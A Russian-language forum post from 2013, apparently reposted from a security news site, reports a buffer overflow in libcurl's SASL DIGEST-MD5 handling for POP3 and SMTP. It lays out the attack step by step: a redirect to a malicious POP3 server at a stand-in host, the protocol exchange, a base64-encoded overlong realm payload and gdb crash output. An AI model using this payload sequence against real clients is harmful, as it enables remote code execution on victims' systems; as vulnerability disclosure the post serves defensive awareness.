Удалённое исполнение кода в libcurl

Discussion in 'Мировые новости. Обсуждения.' started by Solitude, 8 Feb 2013.

  1. Solitude

    Solitude Member

    Joined:
    29 Aug 2011
    Messages:
    445
    Likes Received:
    23
    Reputations:
    1
    Удалённое исполнение кода в libcurl

    Компания Volema обнаружила баг с переполнением буфера в обработчике POP3 и SMTP библиотеки libcurl последних версий (от 7.26.0), а также опубликовала код для удалённой эксплуатации этого бага.

    Суть в том, что в процессе аутентификации SASL DIGEST-MD5 функция Curl_sasl_create_digest_md5_message() использует данные, получаемые с сервера, не проверяя при этом должны образом размер данных, но присоединяя их к локальному буферу фиксированного размера в стеке. Таким образом, если жертва посылает запросы к серверу злоумышленника, то сервер может ответить таким образом, что переполнит размер буфера и запустит на исполнение произвольный код в системе жертвы.

    Вектор атаки выглядит таким образом. Жертва посылает обычный запрос с помощью libcurl.
    Code:
    GET / HTTP/1.0
Host: evilserver.com
    Сервер отвечает:
    Code:
    HTTP/1.0 302 Found
Location: pop3://x:x@evilserver.com/.
    «Умный» libcurl подчиняется указанию на редирект и соединяется с evilserver.com по POP3 через TCP/110. Сервер отвечает.
    Code:
    +OK POP3 server ready
    Curl посылает запрос.
    Code:
    CAPA
    Сервер отвечает, что поддерживает только DIGEST-MD5.
    Code:
    +OK List of capabilities follows
SASL DIGEST-MD5
IMPLEMENTATION dumbydumb POP3 server
    Libcurl принимает условия.
    Code:
    AUTH DIGEST-MD5
    И сервер отгружает клиенту вредоносный код.
    +
    Code:
    cmVhbG09IkFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBI
ixub25jZT0iT0E2TUc5dEVRR20yaGgiLHFvcD0iYXV0aCIsYWxnb3JpdGhtPW1kNS1zZXNzLGNoYXJzZXQ9dXRmLTg=
    Происходит переполнение буфера, поскольку тот имеет фиксированный размер.
    Code:
    realm="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",nonce="OA6MG9tEQGm2hh",qop="auth",
algorithm=md5-sess,charset=utf-8
    В gdb это выглядит так:
    Code:
    Program received signal SIGSEGV, Segmentation fault.
0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) bt
#0  0x00007fd2b238298d in ?? () from /lib/x86_64-linux-gnu/libc.so.6
#1  0x00007fd2b2a5cc07 in Curl_sasl_create_digest_md5_message ()
   from /home/kyprizel/test/curl-7.28.1/lib/.libs/libcurl.so.4
#2  0x4141414141414141 in ?? ()
...
#1469 0x4141414141414141 in ?? ()
#1470 0x656d616e72657375 in ?? ()
Cannot access memory at address 0x7fff63b8b000
    Оригинальный эксплойт: pop3d.py

    08.02.2013
    http://www.xakep.ru/post/60088/.​
     
    #1 Solitude, 8 Feb 2013
(You must log in or sign up to post here.)